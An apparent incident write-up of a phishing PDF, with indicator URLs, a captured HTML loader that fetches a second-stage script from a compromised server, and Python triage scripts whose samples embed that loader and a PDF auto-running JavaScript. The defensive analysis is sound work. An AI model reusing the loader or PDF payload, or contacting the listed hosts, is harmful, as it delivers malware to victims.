Incident Details
A phishing email was delivered to a distribution list (DL) and to one individual user. A user on the DL opened the attached PDF, which triggered an alert in CB. On analysis, we observed that the PDF contains JavaScript (JS) with a constant key, which may be used for encryption. Because the second-stage JS file had already been removed from the compromised server the attacker used, our visibility into whether this was a ransomware delivery is low. The detailed analysis follows:
Analyzed the file in REMnux.
From the above output, we observed that the PDF contains two URIs.
Used pdf-parser to extract the URL:
hxxp[://]45[.]11[.]182[.]128/index[.]php
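The check above (pull every /URI out of the PDF and note whether the document can run script) can be scripted for bulk triage. The following is an added example written for this write-up, not the report's own tooling and not pdf-parser; the PDF it inspects is constructed inline for the example and carries the URL from the report. Real samples often keep these objects inside FlateDecode-compressed object streams, which pdf-parser inflates for you and this plain byte scan does not.

```python
"""Lightweight PDF triage: list /URI targets and flag script indicators.

Added example, not part of the original incident report. It mimics the
check done with pdf-parser on REMnux: scan the raw PDF objects, pull every
/URI string and flag /JS, /JavaScript, /OpenAction, /AA and /Launch, the
names that tell a responder the document can run script or auto-open a link.
Limitations (deliberate): no inflating of compressed object streams and no
handling of escaped parentheses or hex strings inside /URI values.
"""
import re

# Constructed minimal PDF: one page with a /URI link annotation plus an
# /OpenAction that runs inline JavaScript. The URL is the one from the report.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 5 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /Annots [4 0 R] >> endobj
4 0 obj << /Type /Annot /Subtype /Link /A << /S /URI /URI (http://45.11.182.128/index.php) >> >> endobj
5 0 obj << /S /JavaScript /JS (app.launchURL("http://45.11.182.128/index.php", true);) >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# /URI followed by a literal string in parentheses.
URI_RE = re.compile(rb"/URI\s*\((.*?)\)", re.S)
# Dictionary names that mean "this document can execute or auto-trigger".
INDICATOR_RE = re.compile(rb"/(JavaScript|JS|OpenAction|AA|Launch)\b")


def extract_uris(pdf_bytes):
    """Return every /URI string found in the raw PDF, in file order."""
    return [m.group(1).decode("latin-1") for m in URI_RE.finditer(pdf_bytes)]


def script_indicators(pdf_bytes):
    """Return the sorted set of script/auto-action names present."""
    return sorted({m.group(1).decode() for m in INDICATOR_RE.finditer(pdf_bytes)})


def defang(url):
    """Defang a URL the same way the report does (hxxp, [://], [.])."""
    return url.replace("http", "hxxp", 1).replace("://", "[://]").replace(".", "[.]")


def triage(pdf_bytes):
    """Summarise a PDF for a ticket: defanged URIs, indicators, verdict."""
    uris = extract_uris(pdf_bytes)
    flags = script_indicators(pdf_bytes)
    return {
        "uris": [defang(u) for u in uris],
        "indicators": flags,
        # A document that both carries script and points at an external URL
        # is the combination seen in this incident and worth escalating.
        "suspicious": bool(flags) and bool(uris),
    }


if __name__ == "__main__":
    print(triage(SAMPLE_PDF))
```

Running the block against the constructed sample prints the defanged URL in exactly the form shown above, together with the JS and OpenAction indicators. Swap `SAMPLE_PDF` for `open(path, "rb").read()` to run it on a quarantined attachment.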
Visiting the URL from the sandbox drops the following file (an HTML page whose inline script defines the key and then loads a second-stage JS file):
<!DOCTYPE html><html><head><script>
const url_string = "targeted email (intentionally removed here)";
const key = "27e2b9cb39107e8c0784dd5ea26383vb2u88jcda";</script><script src="hxxps[://]modernanegocios[.]com[.]br/extra/assets/css/jiggy[.]js"></script></head><body><p>loading....</p></body></html>
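When a loader like this is captured, the two things to record are the hard-coded constants and where the missing second stage was fetched from. The following parser is an added example written for this write-up, not the report's own code; the HTML it parses is the captured loader with the victim address replaced by a placeholder, and the key is the value shown in the report.

```python
"""Triage of a dropped HTML/JS loader like the one captured above.

Added example, not from the original report. It extracts every `const`
assignment from inline <script> blocks and every external <script src>,
defangs the script URLs for reporting, and flags the pattern seen in this
incident: a hard-coded key sitting next to a remote second stage that the
analyst can no longer retrieve.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Captured loader from the report; the targeted address is replaced with a
# placeholder, the key is the value the report shows.
CAPTURED_LOADER = '''<!DOCTYPE html><html><head><script>
const url_string = "victim@example.invalid";
const key = "27e2b9cb39107e8c0784dd5ea26383vb2u88jcda";</script><script src="https://modernanegocios.com.br/extra/assets/css/jiggy.js"></script></head><body><p>loading....</p></body></html>'''

# `const name = "value";` with either quote style.
CONST_RE = re.compile(r'\bconst\s+(\w+)\s*=\s*["\']([^"\']*)["\']')


class LoaderParser(HTMLParser):
    """Collect external script sources and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser hands <script> contents to handle_data as raw text.
        if self._in_script:
            self.inline.append(data)


def defang(url):
    """Defang a URL the same way the report does (hxxp, [://], [.])."""
    return url.replace("http", "hxxp", 1).replace("://", "[://]").replace(".", "[.]")


def analyze_loader(html):
    """Return constants, defanged second-stage URLs, hosts and a verdict."""
    parser = LoaderParser()
    parser.feed(html)
    parser.close()
    consts = {}
    for chunk in parser.inline:
        consts.update(CONST_RE.findall(chunk))
    hosts = sorted({urlparse(u).hostname for u in parser.external if urlparse(u).hostname})
    return {
        "constants": consts,
        "external_scripts": [defang(u) for u in parser.external],
        "hosts": hosts,
        # The key is most likely consumed by the script we cannot see; that
        # combination is what should drive blocking the host and escalating.
        "hardcoded_key_with_remote_stage": "key" in consts and bool(parser.external),
    }


if __name__ == "__main__":
    print(analyze_loader(CAPTURED_LOADER))
```

The `hosts` list is what goes to the proxy or DNS block list; the `constants` dictionary is what goes into the case notes so the key can be matched if the second stage is ever recovered from another sandbox run or a web cache.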
Decoding this in CyberChef gives us another JS file.
It contains a constant key that may be used for encryption:
<!DOCTYPE html><html><head><script>
const url_string = "targeted email (intentionally removed here)";
const key = "27e2b9cb39107e8c0784dd5ea26383vb2u88jcda";</script><script src="hxxps[://]modernanegocios[.]com[.]br/extra/assets/css/jiggy[.]js"></script></head><body><p>loading....</p></body></html>